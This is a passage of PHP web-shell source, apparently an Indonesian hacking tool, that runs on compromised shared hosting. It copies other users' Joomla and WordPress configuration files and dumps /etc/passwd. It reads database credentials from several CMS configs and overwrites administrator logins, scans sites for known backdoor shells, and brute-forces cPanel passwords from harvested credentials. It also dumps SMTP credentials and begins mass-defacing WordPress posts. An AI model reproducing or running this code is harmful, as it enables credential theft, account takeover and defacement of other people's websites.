  2807. "/home3/$user_chonx/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  2808. "/home3/$user_chonx/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2809. "/home3/$user_chonx/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2810. "/home3/$user_chonx/public_html/Home/configuration.php" => "JoomlaHome",
  2811. "/home3/$user_chonx/public_html/HOME/configuration.php" => "JoomlaHome",
  2812. "/home3/$user_chonx/public_html/home/configuration.php" => "JoomlaHome",
  2813. "/home3/$user_chonx/public_html/NEW/configuration.php" => "JoomlaNew",
  2814. "/home3/$user_chonx/public_html/New/configuration.php" => "JoomlaNew",
  2815. "/home3/$user_chonx/public_html/new/configuration.php" => "JoomlaNew",
  2816. "/home3/$user_chonx/public_html/News/configuration.php" => "JoomlaNews",
  2817. "/home3/$user_chonx/public_html/NEWS/configuration.php" => "JoomlaNews",
  2818. "/home3/$user_chonx/public_html/news/configuration.php" => "JoomlaNews",
  2819. "/home3/$user_chonx/public_html/Cms/configuration.php" => "JoomlaCms",
  2820. "/home3/$user_chonx/public_html/CMS/configuration.php" => "JoomlaCms",
  2821. "/home3/$user_chonx/public_html/cms/configuration.php" => "JoomlaCms",
  2822. "/home3/$user_chonx/public_html/Main/configuration.php" => "JoomlaMain",
  2823. "/home3/$user_chonx/public_html/MAIN/configuration.php" => "JoomlaMain",
  2824. "/home3/$user_chonx/public_html/main/configuration.php" => "JoomlaMain",
  2825. "/home3/$user_chonx/public_html/Blog/configuration.php" => "JoomlaBlog",
  2826. "/home3/$user_chonx/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2827. "/home3/$user_chonx/public_html/blog/configuration.php" => "JoomlaBlog",
  2828. "/home3/$user_chonx/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2829. "/home3/$user_chonx/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2830. "/home3/$user_chonx/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2831. "/home3/$user_chonx/public_html/beta/configuration.php" => "JoomlaBeta",
  2832. "/home3/$user_chonx/public_html/Beta/configuration.php" => "JoomlaBeta",
  2833. "/home3/$user_chonx/public_html/BETA/configuration.php" => "JoomlaBeta",
  2834. "/home3/$user_chonx/public_html/PRESS/configuration.php" => "JoomlaPress",
  2835. "/home3/$user_chonx/public_html/Press/configuration.php" => "JoomlaPress",
  2836. "/home3/$user_chonx/public_html/press/configuration.php" => "JoomlaPress",
  2837. "/home3/$user_chonx/public_html/Wp/configuration.php" => "JoomlaWp",
  2838. "/home3/$user_chonx/public_html/wp/configuration.php" => "JoomlaWp",
  2839. "/home3/$user_chonx/public_html/WP/configuration.php" => "JoomlaWP",
  2840. "/home3/$user_chonx/public_html/portal/configuration.php" => "JoomlaPortal",
  2841. "/home3/$user_chonx/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2842. "/home3/$user_chonx/public_html/Portal/configuration.php" => "JoomlaPortal",
  2843. "/home3/$user_chonx/public_html/wp-config.php" => "WordPress",
  2844. "/home3/$user_chonx/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2845. "/home3/$user_chonx/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2846. "/home3/$user_chonx/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2847. "/home3/$user_chonx/public_html/Home/wp-config.php" => "WordPressHome",
  2848. "/home3/$user_chonx/public_html/HOME/wp-config.php" => "WordPressHome",
  2849. "/home3/$user_chonx/public_html/home/wp-config.php" => "WordPressHome",
  2850. "/home3/$user_chonx/public_html/NEW/wp-config.php" => "WordPressNew",
  2851. "/home3/$user_chonx/public_html/New/wp-config.php" => "WordPressNew",
  2852. "/home3/$user_chonx/public_html/new/wp-config.php" => "WordPressNew",
  2853. "/home3/$user_chonx/public_html/News/wp-config.php" => "WordPressNews",
  2854. "/home3/$user_chonx/public_html/NEWS/wp-config.php" => "WordPressNews",
  2855. "/home3/$user_chonx/public_html/news/wp-config.php" => "WordPressNews",
  2856. "/home3/$user_chonx/public_html/Cms/wp-config.php" => "WordPressCms",
  2857. "/home3/$user_chonx/public_html/CMS/wp-config.php" => "WordPressCms",
  2858. "/home3/$user_chonx/public_html/cms/wp-config.php" => "WordPressCms",
  2859. "/home3/$user_chonx/public_html/Main/wp-config.php" => "WordPressMain",
  2860. "/home3/$user_chonx/public_html/MAIN/wp-config.php" => "WordPressMain",
  2861. "/home3/$user_chonx/public_html/main/wp-config.php" => "WordPressMain",
  2862. "/home3/$user_chonx/public_html/Blog/wp-config.php" => "WordPressBlog",
  2863. "/home3/$user_chonx/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2864. "/home3/$user_chonx/public_html/blog/wp-config.php" => "WordPressBlog",
  2865. "/home3/$user_chonx/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2866. "/home3/$user_chonx/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2867. "/home3/$user_chonx/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2868. "/home3/$user_chonx/public_html/beta/wp-config.php" => "WordPressBeta",
  2869. "/home3/$user_chonx/public_html/Beta/wp-config.php" => "WordPressBeta",
  2870. "/home3/$user_chonx/public_html/BETA/wp-config.php" => "WordPressBeta",
  2871. "/home3/$user_chonx/public_html/PRESS/wp-config.php" => "WordPressPress",
  2872. "/home3/$user_chonx/public_html/Press/wp-config.php" => "WordPressPress",
  2873. "/home3/$user_chonx/public_html/press/wp-config.php" => "WordPressPress",
  2874. "/home3/$user_chonx/public_html/Wp/wp-config.php" => "WordPressWp",
  2875. "/home3/$user_chonx/public_html/wp/wp-config.php" => "WordPressWp",
  2876. "/home3/$user_chonx/public_html/WP/wp-config.php" => "WordPressWP",
  2877. "/home3/$user_chonx/public_html/portal/wp-config.php" => "WordPressPortal",
  2878. "/home3/$user_chonx/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2879. "/home3/$user_chonx/public_html/Portal/wp-config.php" => "WordPressPortal"
  2880. );
  2881. foreach($grab_config as $config => $nama_config) {
  2882. $ambil_config = file_get_contents($config);
  2883. if($ambil_config == '') {
  2884. } else {
  2885. $file_config = fopen("viewcg/$user_chonx-$nama_config.txt","w");
  2886. fputs($file_config,$ambil_config);
  2887. }
  2888. }
  2889. }
  2890. }
  2891. echo "<center><a href='?dir=$dir/viewcg'><font color=lime>Done</font></a></center>";
  2892. }else{
  2893.  
  2894. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2895. echo file_get_contents('/etc/passwd');
  2896. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  2897. }
  2898. } elseif($_GET['do'] == 'jumping') {
  2899. $i = 0;
  2900. echo "<pre><div class='margin: 5px auto;'>";
  2901. $etc = fopen("/etc/passwd", "r");
  2902. while($passwd = fgets($etc)) {
  2903. if($passwd == '' || !$etc) {
  2904. echo "<font color=red>Can't read /etc/passwd</font>";
  2905. } else {
  2906. preg_match_all('/(.*?):x:/', $passwd, $user);
  2907. foreach($user[1] as $users) {
  2908. $user_dir = "/home/$users/backupwordpress/";
  2909. if(is_readable($user_dir)) {
  2910. $i++;
  2911. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_dir'><font color=gold>/home/$users/backupwordpress</font></a><br>";
  2912. if(is_writable($user_dir)) {
  2913. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_dir'><font color=gold>/home/$users/backupwordpress/</font></a><br>";
  2914. }
  2915. echo $jrw;
  2916. $domain_jump = file_get_contents("/etc/named.conf");
  2917. if($domain_jump == '') {
  2918. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2919. } else {
  2920. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2921. foreach($domains_jump[1] as $dj) {
  2922. $user_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2923. $user_url = $user_url['name'];
  2924. if($user_url == $users) {
  2925. echo " => ( <u>$dj</u> )<br>";
  2926. break;
  2927. }
  2928. }
  2929. }
  2930. }
  2931. }
  2932. }
  2933. }
  2934. if($i == 0) {
  2935. } else {
  2936. echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  2937. }
  2938. echo "</div></pre>";
  2939. } elseif($_GET['do'] == 'auto_edit_user') {
  2940. if($_POST['hajar']) {
  2941. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2942. echo "username atau password harus lebih dari 6 karakter";
  2943. } else {
  2944. $user_baru = $_POST['user_baru'];
  2945. $pass_baru = md5($_POST['pass_baru']);
  2946. $conf = $_POST['config_dir'];
  2947. $scan_conf = scandir($conf);
  2948. foreach($scan_conf as $file_conf) {
  2949. if(!is_file("$conf/$file_conf")) continue;
  2950. $config = file_get_contents("$conf/$file_conf");
  2951. if(preg_match("/JConfig|joomla/",$config)) {
  2952. $dbhost = ambilkata($config,"host = '","'");
  2953. $dbuser = ambilkata($config,"user = '","'");
  2954. $dbpass = ambilkata($config,"password = '","'");
  2955. $dbname = ambilkata($config,"db = '","'");
  2956. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2957. $prefix = $dbprefix."users";
  2958. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2959. $db = mysql_select_db($dbname);
  2960. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2961. $result = mysql_fetch_array($q);
  2962. $id = $result['id'];
  2963. $site = ambilkata($config,"sitename = '","'");
  2964. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2965. echo "Config => ".$file_conf."<br>";
  2966. echo "CMS => Joomla<br>";
  2967. if($site == '') {
  2968. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2969. } else {
  2970. echo "Sitename => $site<br>";
  2971. }
  2972. if(!$update OR !$conn OR !$db) {
  2973. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2974. } else {
  2975. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2976. }
  2977. mysql_close($conn);
  2978. } elseif(preg_match("/WordPress/",$config)) {
  2979. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2980. $dbuser = ambilkata($config,"DB_USER', '","'");
  2981. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2982. $dbname = ambilkata($config,"DB_NAME', '","'");
  2983. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2984. $prefix = $dbprefix."users";
  2985. $option = $dbprefix."options";
  2986. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2987. $db = mysql_select_db($dbname);
  2988. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2989. $result = mysql_fetch_array($q);
  2990. $id = $result[ID];
  2991. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2992. $result2 = mysql_fetch_array($q2);
  2993. $target = $result2[option_value];
  2994. if($target == '') {
  2995. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2996. } else {
  2997. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2998. }
  2999. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3000. echo "Config => ".$file_conf."<br>";
  3001. echo "CMS => Wordpress<br>";
  3002. echo $url_target;
  3003. if(!$update OR !$conn OR !$db) {
  3004. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3005. } else {
  3006. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3007. }
  3008. mysql_close($conn);
  3009. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3010. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3011. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3012. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3013. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3014. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3015. $prefix = $dbprefix."admin_user";
  3016. $option = $dbprefix."core_config_data";
  3017. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3018. $db = mysql_select_db($dbname);
  3019. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3020. $result = mysql_fetch_array($q);
  3021. $id = $result[user_id];
  3022. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3023. $result2 = mysql_fetch_array($q2);
  3024. $target = $result2[value];
  3025. if($target == '') {
  3026. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3027. } else {
  3028. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3029. }
  3030. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3031. echo "Config => ".$file_conf."<br>";
  3032. echo "CMS => Magento<br>";
  3033. echo $url_target;
  3034. if(!$update OR !$conn OR !$db) {
  3035. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3036. } else {
  3037. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3038. }
  3039. mysql_close($conn);
  3040. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3041. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3042. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3043. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3044. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3045. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3046. $prefix = $dbprefix."user";
  3047. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3048. $db = mysql_select_db($dbname);
  3049. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3050. $result = mysql_fetch_array($q);
  3051. $id = $result[user_id];
  3052. $target = ambilkata($config,"HTTP_SERVER', '","'");
  3053. if($target == '') {
  3054. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3055. } else {
  3056. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3057. }
  3058. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3059. echo "Config => ".$file_conf."<br>";
  3060. echo "CMS => OpenCart<br>";
  3061. echo $url_target;
  3062. if(!$update OR !$conn OR !$db) {
  3063. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3064. } else {
  3065. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3066. }
  3067. mysql_close($conn);
  3068. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3069. $dbhost = ambilkata($config,'server = "','"');
  3070. $dbuser = ambilkata($config,'username = "','"');
  3071. $dbpass = ambilkata($config,'password = "','"');
  3072. $dbname = ambilkata($config,'database = "','"');
  3073. $prefix = "users";
  3074. $option = "identitas";
  3075. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3076. $db = mysql_select_db($dbname);
  3077. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3078. $result = mysql_fetch_array($q);
  3079. $target = $result[alamat_website];
  3080. if($target == '') {
  3081. $target2 = $result[url];
  3082. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3083. if($target2 == '') {
  3084. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3085. } else {
  3086. $cek_login3 = file_get_contents("$target2/adminweb/");
  3087. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3088. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3089. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3090. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3091. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3092. } else {
  3093. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3094. }
  3095. }
  3096. } else {
  3097. $cek_login = file_get_contents("$target/adminweb/");
  3098. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3099. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3100. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3101. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3102. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3103. } else {
  3104. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3105. }
  3106. }
  3107. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3108. echo "Config => ".$file_conf."<br>";
  3109. echo "CMS => Lokomedia<br>";
  3110. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3111. echo $url_target2;
  3112. } else {
  3113. echo $url_target;
  3114. }
  3115. if(!$update OR !$conn OR !$db) {
  3116. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3117. } else {
  3118. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3119. }
  3120. mysql_close($conn);
  3121. }
  3122. }
  3123. }
  3124. } else {
  3125. echo "<center>
  3126. <h1>Auto Edit User Config</h1>
  3127. <form method='post'>
  3128. DIR Config: <br>
  3129. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3130. Set User & Pass: <br>
  3131. <input type='text' name='user_baru' value='faisa69' placeholder='user_baru'><br>
  3132. <input type='text' name='pass_baru' value='faisa69' placeholder='pass_baru'><br>
  3133. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  3134. </form>
  3135. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3136. ";
  3137. }
  3138. }elseif($_GET['do'] == 'shelscan') {
  3139. echo'<center><h2>Shell Finder</h2>
  3140. <form action="" method="post">
  3141. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  3142. <br>
  3143. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  3144. </form><br>';
  3145. if (isset($_POST["scan"])) {
  3146. $url = $_POST['traget'];
  3147. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  3148. echo "Result :<br />";
  3149. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  3150. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  3151. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  3152. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  3153. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  3154. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  3155. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  3156. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  3157. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  3158. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  3159. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  3160. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  3161. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  3162. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  3163. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  3164. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  3165. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  3166. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  3167. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  3168. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  3169. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  3170. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  3171. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  3172. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  3173. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","chonx.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  3174. foreach ($shells as $shell){
  3175. $headers = get_headers("$url$shell"); //
  3176. if (eregi('200', $headers[0])) {
  3177. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  3178. $dz = fopen('shells.txt', 'a+');
  3179. $suck = "$url$shell";
  3180. fwrite($dz, $suck."\n");
  3181. }
  3182. }
  3183. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  3184. }
  3185.  
  3186. }
  3187. elseif($_GET['do'] == 'cpanel') {
  3188. if($_POST['crack']) {
  3189. $usercp = explode("\r\n", $_POST['user_cp']);
  3190. $passcp = explode("\r\n", $_POST['pass_cp']);
  3191. $i = 0;
  3192. foreach($usercp as $ucp) {
  3193. foreach($passcp as $pcp) {
  3194. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3195. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3196. } else {
  3197. $_SESSION[$ucp] = "1";
  3198. $_SESSION[$pcp] = "1";
  3199. $i++;
  3200. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3201. }
  3202. }
  3203. }
  3204. }
  3205. if($i == 0) {
  3206. } else {
  3207. echo "<br>Nemu ".$i." Cpanel by <font color=lime>Janchonx</font>";
  3208. }
  3209. } else {
  3210. echo "<center>
  3211. <form method='post'>
  3212. USER: <br>
  3213. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3214. $_usercp = fopen("/etc/passwd","r");
  3215. while($getu = fgets($_usercp)) {
  3216. if($getu == '' || !$_usercp) {
  3217. echo "<font color=red>Can't read /etc/passwd</font>";
  3218. } else {
  3219. preg_match_all("/(.*?):x:/", $getu, $u);
  3220. foreach($u[1] as $user_cp) {
  3221. if(is_dir("/home/$user_cp/public_html")) {
  3222. echo "$user_cp\n";
  3223. }
  3224. }
  3225. }
  3226. }
  3227. echo "</textarea><br>
  3228. PASS: <br>
  3229. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3230. function cp_pass($dir) {
  3231. $pass = "";
  3232. $dira = scandir($dir);
  3233. foreach($dira as $dirb) {
  3234. if(!is_file("$dir/$dirb")) continue;
  3235. $ambil = file_get_contents("$dir/$dirb");
  3236. if(preg_match("/WordPress/", $ambil)) {
  3237. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3238. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3239. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3240. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3241. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3242. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3243. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3244. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3245. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3246. } elseif(preg_match("/client/", $ambil)) {
  3247. preg_match("/password=(.*)/", $ambil, $pass1);
  3248. if(preg_match('/"/', $pass1[1])) {
  3249. $pass1[1] = str_replace('"', "", $pass1[1]);
  3250. $pass .= $pass1[1]."\n";
  3251. }
  3252. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3253. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3254. }
  3255. }
  3256. echo $pass;
  3257. }
  3258. $cp_pass = cp_pass($dir);
  3259. echo $cp_pass;
  3260. echo "</textarea><br>
  3261. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3262. </form>
  3263. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3264. }
  3265. } elseif($_GET['do'] == 'smtp') {
  3266. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3267. function scj($dir) {
  3268. $dira = scandir($dir);
  3269. foreach($dira as $dirb) {
  3270. if(!is_file("$dir/$dirb")) continue;
  3271. $ambil = file_get_contents("$dir/$dirb");
  3272. $ambil = str_replace("$", "", $ambil);
  3273. if(preg_match("/JConfig|joomla/", $ambil)) {
  3274. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3275. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3276. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3277. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3278. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3279. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3280. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  3281. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  3282. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  3283. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  3284. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  3285. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  3286. }
  3287. }
  3288. }
  3289. $smpt_hunter = scj($dir);
  3290. echo $smpt_hunter;
  3291. } elseif($_GET['do'] == 'auto_wp') {
  3292. if($_POST['hajar']) {
  3293. $title = htmlspecialchars($_POST['new_title']);
  3294. $pn_title = str_replace(" ", "-", $title);
  3295. if($_POST['cek_edit'] == "Y") {
  3296. $script = $_POST['edit_content'];
  3297. } else {
  3298. $script = $title;
  3299. }
  3300. $conf = $_POST['config_dir'];
  3301. $scan_conf = scandir($conf);
  3302. foreach($scan_conf as $file_conf) {
  3303. if(!is_file("$conf/$file_conf")) continue;
  3304. $config = file_get_contents("$conf/$file_conf");
  3305. if(preg_match("/WordPress/", $config)) {
  3306. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3307. $dbuser = ambilkata($config,"DB_USER', '","'");
  3308. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3309. $dbname = ambilkata($config,"DB_NAME', '","'");
  3310. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3311. $prefix = $dbprefix."posts";
  3312. $option = $dbprefix."options";
  3313. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3314. $db = mysql_select_db($dbname);
  3315. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3316. $result = mysql_fetch_array($q);
  3317. $id = $result[ID];
  3318. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3319. $result2 = mysql_fetch_array($q2);
  3320. $target = $result2[option_value];
  3321. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3322. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3323. echo "<div style='margin: 5px auto;'>";
  3324. if($target == '') {
  3325. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  3326. } else {
